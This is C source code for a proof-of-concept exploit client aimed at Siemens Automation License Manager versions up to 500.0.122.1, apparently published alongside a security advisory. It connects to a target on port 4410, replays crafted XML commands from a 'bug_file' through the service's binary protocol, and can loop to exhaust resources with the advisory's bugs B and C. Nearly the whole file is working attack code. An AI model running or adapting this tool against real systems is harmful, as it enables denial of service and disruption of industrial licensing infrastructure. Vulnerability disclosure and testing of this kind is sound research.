/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include <ctype.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define strnicmp    strncasecmp
    #define strnistr    strncasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        4410



typedef struct {
    int     type;
    u8      *name;
} types_t;
types_t types[] = { // simply scanned so not important
    { 0x01, "get_target_lists" },
    { 0x02, "get_list_objects" },
    { 0x03, "transfer_license" },
    { 0x04, "web_transfer_licensekey" },
    { 0x05, "check_licensekey" },
    { 0x06, "grant" },
    { 0x07, "free" },
    { 0x08, "get_license_metadata" },
    { 0x09, "initiate_challenge" },
    { 0x0a, "get_licensekey" },
    { 0x0b, "put_licensekey" },
    { 0x0c, "repair_licensekey" },
    { 0x0d, "upgrade_licensekey" },
    { 0x0e, "downgrade_licensekey" },
    { 0x0f, "delete_licensekey" },
    { 0x10, "grant_remote_license" },
    { 0x11, "free_remote_license" },
    { 0x13, "check_server_license" },
    { 0x14, "get_history" },
    { 0x15, "put_history" },
    { 0x16, "get_installed_sw" },
    { 0x17, "init_repair_licensekey" },
    { 0x18, "check_pc" },
    { 0x19, "get_upgrade_info" },
    { 0x1a, "read_licensekey" },
    { 0x1b, "get_licensekey_web_retry" },
    { 0x1c, "addto_history" },
    { 0x1d, "get_addin_menus" },
    { 0x1e, "close_target" },
    { 0x1f, "backup_repair" },
    { 0x20, "get_license_metadata_for_repair" },
    { 0x21, "get_target_ocx_param" },
    { 0x22, "send_target_ocx_param" },
    { 0x23, "get_target_info" },
    { 0x24, "get_target_lk_demand" },
    { 0x25, "offline_transferable_licensekeys" },
    { 0x26, "get_add_columns" },
    { 0x27, "delete_offline" },
    { 0x28, "get_load_into_target_info" },
    { 0x29, "get_load_from_target_info" },
    { 0x2a, "get_matching_licensekeys" },
    { 0x2b, "removefrom_history" },
    { 0x2c, "initialize_plugins" },
    { 0x2d, "get_protocol_entries" },
    { 0x2e, "del_protocol_entries" },
    { 0x2f, "get_statistic_data" },
    { 0x30, "open_session" },
    { 0x31, "lkh_command" },
    { 0x32, "get_used_files" },
    { 0x33, "get_server_fcrights" },
    { 0x34, "set_server_fcrights" },
    { 0x8d, "ForceRemove" },
    { 0x8e, "NoRemove" },
    { 0x8f, "Delete" },
    { 0x97, "get_target_lists" },
    { 0x98, "get_list_objects" },
    { 0x99, "transfer_license" },
    { 0x9a, "web_transfer_licensekey" },
    { 0x9b, "check_licensekey" },
    { 0x9c, "grant" },
    { 0x9d, "free" },
    { 0x9e, "get_license_metadata" },
    { 0x9f, "initiate_challenge" },
    { 0xa0, "get_licensekey" },
    { 0xa1, "put_licensekey" },
    { 0xa2, "repair_licensekey" },
    { 0xa3, "upgrade_licensekey" },
    { 0xa4, "downgrade_licensekey" },
    { 0xa5, "delete_licensekey" },
    { 0xa6, "grant_remote_license" },
    { 0xa7, "free_remote_license" },
    { 0xa9, "check_server_license" },
    { 0xaa, "get_history" },
    { 0xab, "put_history" },
    { 0xac, "get_installed_sw" },
    { 0xad, "init_repair_licensekey" },
    { 0xae, "check_pc" },
    { 0xaf, "get_upgrade_info" },
    { 0xb0, "read_licensekey" },
    { 0xb1, "get_licensekey_web_retry" },
    { 0xb2, "addto_history" },
    { 0xb3, "get_addin_menus" },
    { 0xb4, "close_target" },
    { 0xb5, "backup_repair" },
    { 0xb6, "get_license_metadata_for_repair" },
    { 0xb7, "get_target_ocx_param" },
    { 0xb8, "send_target_ocx_param" },
    { 0xb9, "get_target_info" },
    { 0xba, "get_target_lk_demand" },
    { 0xbb, "offline_transferable_licensekeys" },
    { 0xbc, "get_add_columns" },
    { 0xbd, "delete_offline" },
    { 0xbe, "get_load_into_target_info" },
    { 0xbf, "get_load_from_target_info" },
    { 0xc0, "get_matching_licensekeys" },
    { 0xc1, "removefrom_history" },
    { 0xc2, "initialize_plugins" },
    { 0xc3, "get_protocol_entries" },
    { 0xc4, "del_protocol_entries" },
    { 0xc5, "get_statistic_data" },
    { 0xc6, "open_session" },
    { 0xc7, "lkh_command" },
    { 0xc8, "get_used_files" },
    { 0xc9, "get_server_fcrights" },
    { 0xca, "set_server_fcrights" },
    { 0,    NULL },
};
static const u8 xml_header[] =  // necessary in each packet so let's make it automatic
                "<?xml version=\"1.0\" encoding=\"UTF-16LE\" standalone=\"yes\" ?>";



int     lame_loop = 0;  // just for consuming resources with bugs B and C



int myfgets(u8 **buffx, FILE *fd);
int lame_getset(u8 *buff, u8 *pat, u8 **getx, u8 *set);
int tcp_recv(int sd, u8 *buff, int size);
u8 *recv_alm(int sd);
int send_alm(int sd, int type, u8 *msg);
int putss(u8 *data, u8 *str);
int putxx(u8 *data, u32 num, int bits);
char *stristr(const char *String, const char *Pattern);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer;
    FILE    *fd         = NULL;
    int     sd          = 0,
            i,
            t,
            len,
            pck;
    u16     port        = PORT;
    u8      *host       = NULL,
            *buff       = NULL,
            *data       = NULL,
            *bug_file   = NULL,
            *guid       = NULL,
            *name       = NULL,
            *serialid   = NULL,
            *plugintype = NULL;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    //setbuf(stdout, NULL);

    fputs("\n"
        "Siemens Automation License Manager <= 500.0.122.1 vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug_file> <host> [port(%d)]\n"
            "\n"
            "bug_file is the file containing the sequence of commands to use, check my\n"
            "advisory and the original zip archive with the bug_files to test\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug_file = argv[1];
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

lame_loop_start:
    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();

    // first packet, just the name of the server that it's not necessary to set
    buff = realloc(buff, 0x204);
    if(!buff) std_err();
    memset(buff, 0, 0x204);
    if(send(sd, buff, 0x204, 0) < 0) goto quit;
    len = tcp_recv(sd, buff, 0x10);
    if(len < 0) goto quit;

    printf("- open bug_file %s\n", bug_file);
    fd = fopen(bug_file, "rb");
    if(!fd) std_err();

    pck = 0;
    for(;;) {
        len = myfgets(&buff, fd);
        if(len < 0) break;
        if(!buff[0]) continue;
        if(buff[0] == '/') continue;    // comments
        if(buff[0] == ';') continue;    // comments

        if((buff[0] == '<') && (buff[1] == '?')) {
            // xml header ok
        } else {
            t = strlen(xml_header);
            buff = realloc(buff, t + len + 1);
            for(i = len /* delimiter included */; i >= 0; i--) {
                buff[i + t] = buff[i];
            }
            memcpy(buff, xml_header, t);
        }

        lame_getset(buff, "GUID=\"", NULL, guid);
        lame_getset(buff, "<name>", NULL, name);
        lame_getset(buff, "<plugintype>", NULL, plugintype);
        lame_getset(buff, "<serialid>", NULL, serialid);

        printf("\nSEND:\n%.*s%s\n", 400, buff, (strlen(buff) > 400) ? "..." : "");
        if(send_alm(sd, pck ? -1 : 200, buff) < 0) goto quit;
        pck++;

        data = recv_alm(sd);
        if(!data) goto quit;
        printf("\nRECV:\n%s\n", data);

        lame_getset(data, "<guid>", &guid, NULL);
        lame_getset(data, "<name>", &name, NULL);
        lame_getset(data, "<plugintype>", &plugintype, NULL);
        lame_getset(data, "<serialid>", &serialid, NULL);
    }

quit:
    if(fd) fclose(fd);
    if(sd) close(sd);
    printf("\n- done\n");
    if(lame_loop) goto lame_loop_start;
    return(0);
}



int myfgets(u8 **buffx, FILE *fd) {
    int     i,
            c = -1;
    u8      *buff,
            *p;

    if(!buffx) return(-1);
    buff = *buffx;
    for(i = 0;; i++) {
        if(!(i % 1024)) buff = realloc(buff, i + 1024 + 1);
        c = fgetc(fd);
        if(c < 0) break;
        buff[i] = c;
        if(!c) break;
        if(c == '\n') break;
    }
    buff[i] = 0;
    *buffx = buff;
    if(!i && (c < 0)) return(-1);

    for(p = buff; *p && (*p != '\r') && (*p != '\n'); p++);
    *p = 0;
    return(p - buff);
}



int lame_getset(u8 *buff, u8 *pat, u8 **getx, u8 *set) {
    int     len;
    u8      *get,
            *p,
            *l;

    len = strlen(pat);

    if(set) {
        p = stristr(buff, pat);
        if(p) {
            memcpy(p + len, set, strlen(set));
            return(0);
        }
    }

    if(getx) {
        get = *getx;
        p = stristr(buff, pat);
        if(p) {
            p += len;
            l = strchr(p, '<');
            if(!l) l = p + strlen(p);
            get = realloc(get, (l - p) + 1);
            memcpy(get, p, l - p);
            get[l - p] = 0;
            printf("\nSET %s: %s\n", pat, get);
            *getx = get;
            return(0);
        }
    }
    return(-1);
}



int tcp_recv(int sd, u8 *buff, int size) {
    int     i;
    u8      c;

    for(i = 0; i < size; i++) {
        if(timeout(sd, lame_loop ? 1 : 3) < 0) return(-1);
        if(recv(sd, buff ? (buff + i) : ((void *)&c), 1, 0) <= 0) return(-1);
    }
    return(i);
}



u8 *recv_alm(int sd) {
    static u8   *buff = NULL;
    int     t;
    u32     size;
    u8      *p,
            *o;

    if(tcp_recv(sd, (void *)&size, 4) < 0) return(NULL);
    if(size == -1) return(NULL);
    buff = realloc(buff, size + 1);
    if(!buff) return(NULL);
    if(tcp_recv(sd, buff, size) < 0) return(NULL);
    p = buff;
    if(*p == 0xff) {
        p++;    // 0xff
        p++;    // 0xfe
        for(t = 0; (*p == 0xff) && ((p - buff) < size); t++, p++);
        p += t;
        o = buff;
        while((p - buff) < size) {
            *o++ = *p++;
            p++;
        }
        size = o - buff;
    }
    buff[size] = 0;
    return(buff);
}



int send_alm(int sd, int type, u8 *msg) {
    static u8   *buff = NULL;
    int     i,
            len;
    u8      *p,
            *l;

    len = strlen(msg);

    buff = realloc(buff, 4 + 4 + 64 + len * 2);
    if(!buff) return(-1);

    if(type < 0) {
        p = strstr(msg, "><");
        if(p) {
            p += 2;
            for(l = p; *l; l++) {
                if(isalnum(*l) || (*l == '_')) continue;
                break;
            }
            for(i = 0; types[i].name; i++) {
                if(!strnicmp(p, types[i].name, l - p) && !types[i].name[l - p]) {
                    type = types[i].type;
                    break;
                }
            }
        }
    }
    if(type < 0) {
        printf("\nError: no corresponding type found for the specified command\n");
        exit(1);
    }

    p = buff;
    p += putxx(p, type, 32);
    p += 4;
    p += putss(p, msg);
         putxx(buff + 4, (p - buff) - 8, 32);

    if(send(sd, buff, p - buff, 0) <= 0) return(-1);
    return(0);
}



int putss(u8 *data, u8 *str) {
    u32     i,
            len;
    int     t;
    u8      *p;

    len = strlen(str);
    p = data;
    *p++ = 0xff;    // CMemStream Big strings
    *p++ = 0xfe;
         if(len < 0xff)   t = 8;
    else if(len < 0xffff) t = 16;
    else                  t = 32;
    p += putxx(p, -1,  t);
    p += putxx(p, len, t);
    for(i = 0; i < len; i++) {
        *p++ = str[i];
        *p++ = 0;
    }
    return(p - data);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        //data[i] = num >> ((bytes - 1 - i) << 3);
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



char *stristr(const char *String, const char *Pattern)
{
      char *pptr, *sptr, *start;

      for (start = (char *)String; *start; start++)
      {
            /* find start of pattern in string */
            for ( ; (*start && (toupper(*start) != toupper(*Pattern))); start++)
                  ;
            if (!*start)
                  return 0;

            pptr = (char *)Pattern;
            sptr = (char *)start;

            while (toupper(*sptr) == toupper(*pptr))
            {
                  sptr++;
                  pptr++;

                  /* if end of pattern then pattern was found */

                  if (!*pptr)
                        return (start);
            }
      }
      return 0;
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


